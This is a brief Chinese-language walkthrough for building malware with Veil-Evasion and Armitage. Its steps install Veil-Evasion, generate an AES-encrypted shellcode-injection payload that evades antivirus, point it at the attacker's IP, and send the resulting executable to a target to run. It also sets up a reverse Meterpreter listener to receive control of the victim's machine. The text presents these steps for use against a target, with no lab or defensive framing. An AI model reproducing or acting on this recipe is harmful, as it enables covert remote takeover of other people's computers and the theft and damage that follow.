armitage官網:http://www.fastandeasyhacking.com/
https://www.youtube.com/watch?v=IiOlrShWF44
https://www.youtube.com/watch?v=x50blh_G5zA(安裝講解)
cd /tmp
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion
cd setup
bash setup.sh
Y
bash setup.sh -c
然后就是各種默認安裝了。
cd ..
python Veil-Evasion.py
postgresql start
armitage
點擊armitage,script,load
Veil-Evasion/tools/cortana/veil_evasion.cna
Veil-Evasion,set Veil-Evasion path
把Veil-Evasion.py的絕對路徑粘貼上
Veil-Evasion,Generate
outputbase 起個英文名字,payload默認名字
LHOSTS 你的IP
payload看心情選
這里選35試試,python/shellcode_inject/aes_encrypt
勾選overwrit payloads
點generate
復制output的路徑,看一下生成的exe,發給目標執行
一般是在/user下的
armitage,listeners,reverse
端口隨意
type選meterpreter
然后armitage,listeners,set LHOST 你的IP
有個奇葩的問題,對方執行一次你生成的那個exe,你這里就可以建立一個會話,也就是說,同一個主機,他多開幾次你給的exe文件,你這就顯示上線了一個主機,但建立了很多會話連接,要瘋。